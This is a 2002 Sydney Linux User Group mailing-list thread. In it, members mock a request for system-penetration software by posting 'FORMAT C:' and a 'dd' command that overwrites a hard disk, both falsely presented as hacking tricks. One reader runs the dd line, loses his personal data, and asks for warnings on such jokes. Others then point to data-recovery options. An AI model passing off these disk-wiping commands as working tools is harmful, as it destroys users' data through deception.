www.r-tt.com

Has R-linux to recover from EXT2 file systems and EXT3 which is based on
EXT2

Strangely though it runs on Windows

Chris

-----Original Message-----
From: Booth, Christopher (Aus) - ATP 
Sent: Friday, 19 April 2002 12:51 PM
To: 'Matthew Hannigan'; Booth, Christopher (Aus) - ATP
Cc: 'Daniel Stone'; Matthew Sanderson; [EMAIL PROTECTED]
Subject: RE: [SLUG] i need a sofware to penetrate in to systems


I'm definitely not trolling

I'll get my data back some how I'll leave no stone unturned, but seriously
if people are going to put commands that can potentially ruin a newbie or
gullible person's data, at least make it 100% clear that it is a joke and/or
provide a warning of it's consequences.  I enjoy a joke as much as the next
person.

I'll only be at this company for another 2 weeks, so I don't care about the
OS and stuff.  My personal data which I was just about to back up and write
to CD is going to be hard to replace.

Chris






-----Original Message-----
From: Matthew Hannigan [mailto:[EMAIL PROTECTED]]
Sent: Friday, 19 April 2002 12:28 PM
To: Booth, Christopher (Aus) - ATP
Cc: 'Daniel Stone'; Matthew Sanderson; [EMAIL PROTECTED]
Subject: Re: [SLUG] i need a sofware to penetrate in to systems


I really hope you're not trolling too.,

If not, your data is probably not recoverable.

Theoritically it may be; but it would cost thousands
and thousands to do so.   Do a search for "data recovery"
on google.  One good one seems to be http://www.ibas.com/


Booth, Christopher (Aus) - ATP wrote:
> Ay Caramba
> 
> Does this do what I think it does and is equivalent to format c: in dos ?
> 
> There should have been some warning to this, as not everyone is familiar
> with the dd command (including me)
> 
> I stupidly as a joke tried this, thinking that the nc command would
actually
> do what was thought.
> 
> Please remember that there are newbies and stubies here
> 
> I've no idea if what I've done is fixable, but I'm not happy if I've lost
> all my data on my hard drive.
> I don't care about programs but my personal stuff is hard to replace.
> 
> While it may be fun to take the mickey out of Osama, if you lost all your
> personal data, and didn't have a backup mechanism available to restore it
> from, would you be happy ?
> 
> Disappointedly
> 
> Chris
> -----Original Message-----
> From: Daniel Stone [mailto:[EMAIL PROTECTED]]
> Sent: Wednesday, 17 April 2002 8:19 PM
> To: Matthew Sanderson
> Cc: OSAMA; [EMAIL PROTECTED]
> Subject: Re: [SLUG] i need a sofware to penetrate in to systems
> 
> 
> On Tue, Apr 16, 2002 at 11:52:19PM -0700, Matthew Sanderson wrote:
> 
>>OSAMA,
>>
>>Try this command from a DOS prompt, it accesses the CIA and FBI's websites
>>and lets you access the restricted area:
>>
>>FORMAT C:
> 
> 
> But seriously, I suggest:
> dd if=/dev/zero of=/dev/hda bs=1k | nc <host here> 65535
> 
> This is a zero-byte overflow attack - hosts on port 65535 are vulnerable
> because that's near an overflow region!
> 
> Have fun!
> d
> 


---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 

---
Incoming mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.346 / Virus Database: 194 - Release Date: 10/04/02
 
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug

Reply via email to